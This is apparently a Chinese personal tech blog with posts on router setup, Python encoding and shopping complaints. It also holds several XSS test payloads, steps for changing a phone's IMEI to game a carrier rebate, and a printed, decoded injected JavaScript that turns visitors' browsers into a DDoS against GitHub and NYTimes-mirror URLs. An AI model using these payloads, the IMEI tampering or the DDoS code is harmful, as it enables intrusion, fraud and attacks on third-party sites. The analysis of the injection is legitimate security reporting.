2015年10月12日星期一

高速储能飞轮

那些UFO是不是用的就是利用高速飞轮,来调节能量输出的均衡?并进行储能?

2015年6月16日星期二

xss一例

当前form页面,传到后台的参数已经如下处理:

".htmlentities($_POST["name"]);

于是试了
 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
 {{{ Form:: .. }}}  .' onevent ='prompt(/XSS/);
 .'(( img src=x onerror='javascript:alert(1)
都不行啊,后来发现居然可以利用本地的form绕过,在url中

看来需要测下原来接口一些遗漏的地方了

2015年6月10日星期三

修改手机的串号IMEI

移动搞活动,买手机一定时间后返还话费,结果到现在才说必须手机号与指定手机放在一起使用,才能返还

这些运营商经常搞这种流氓行为的

于是,研究现在用的这部手机,如何修改IMEI号与那部移动手机一样。方法如下,试验一次性成功:
1、下载"移动叔叔工具",备份本机IMEI号
2、到网上找  IMEI号生成工具,或者名称为 IMEI串号生成修改器
3、使用上述工具生成指定串号IMEI,然后用 移动叔叔工具恢复IMEI号,一次性成功

2015年4月1日星期三

这样的js拦截

http://sjs.sinajs.cn/blog7common/js/boot.js 
使用国外IP访问,可得到拦截修改后的js,
eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--)
            r[e(c)] = k[c] || e(c);
        k = [function(e) {
                return r[e]
            }];
        e = function() {
            return '\\w+'
        };
        c = 1
    }
    ;
    while (c--)
        if (k[c])
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);', 62, 64, '|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'), 0, {})) 
进行解密后,得到

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>"); ! window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

上面的意思是,对
这两个网址,隔几秒循环访问一次。从而借助所有上网用户形成DDOS攻击

继续在搞啊

(http://sjs.sinajs.cn/blog7common/js/boot.js)是sina的计数器,大量引用在各种sina业务中,还是和前几天baidu计数器仅针对国外IP一样,眼前这个改写法了。这种搞法,是否除了DDOS github,还能把你的跳板给记录了呢?生活已不易,上网需谨慎,且行且珍惜。

2015年2月5日星期四

京东这个垃圾网站, jd.com is so much dirt

京东 jd.com,在美国上市,交易代码 jd,这样的网站居然也能上市。网站的基本功能都做不好。

最近我买了显示器,今天再登录想买个路由器,结果账户显示有安全风险,需要短信重新验证一下。结果从昨天到今天,怎么折腾都收不到短信验证码。在手机杀毒软件中查看拦截记录,没有,重启手机,也没有,换个手机再重新接收,也没有。
京东这是闹哪样啊?连个基本的验证功能都做的如此垃圾。google 一查,居然有很多人遇到过同样的问题,从2013年京东大量账户盗用后,断断续续出现过各种各样的问题。

作为一个电子商务网站,他们的IT系统做的真是够垃圾

2015年1月21日星期三

解决openwrt无线问题

老设备刷了个openwrt,无线总是出问题

今天拿来的设备,起无线时,端口为down状态
于是 ifconfig wlan0 up,再iwlist scanning,可以看到扫描出许多无线信号来
但此时仍然无法启动ap状态

输入wifi up
提示:
PHY for wifi device radio0 not found
于是输入:
wifi detect > /etc/conrfig/wireless
重新刷新一下设备状态,这样就解决了。

总结:要按照给出的信息,分析最大的可能,按图索骥去解决问题,这样既迅速又效果好

2015年1月8日星期四

python编码输出的一个问题

今天纠结于一个问题

就是内容为这样的TXT文件:
\xc3\xc0\xb9\xfa\xb6\xd3\

直接读出然后print出来,仍然是这样无法阅读的字符,如下:
op = open('1.txt','rb')
print op.read()

怎样转换为可读字符呢?于是
op = open('1.txt','rb')
print op.read().decode('utf-8').encode('gbk')
print op.read().decode('gbk')
print op.read().encode('gbk')

各种报错啊,
最后终于弄好了,如下方式输出,即是正常的字符了
print op.read().decode('string_escape').decode('gbk')

2015年1月7日星期三

我的无线路由器配置

我的无线路由器配置入下:
 周一至周五
晚上11:30关闭无线,要睡觉了。睡觉避免辐射
早上7点打开无线,手机要同步数据,kindle要离线下载最新资讯,上班路上看
早上9点关闭无线
下午16点开启无线等待楼主下班回家

周六至周日
凌晨0点关闭无线睡觉
早上7点开启无线至第二天凌晨0点,默认情况下关闭无线,因大部分周未不在屋里,故需手工开启

30 23 * * 1-5 /sbin/wifi down
0 7 * * 1-5 /sbin/wifi up
0 9 * * 1-5 /sbin/wifi down
45 18 * * 1-5 /sbin/wifi up
0 0 * * 6,0 /sbin/wifi down
0 7 * * 6,0 /sbin/wifi down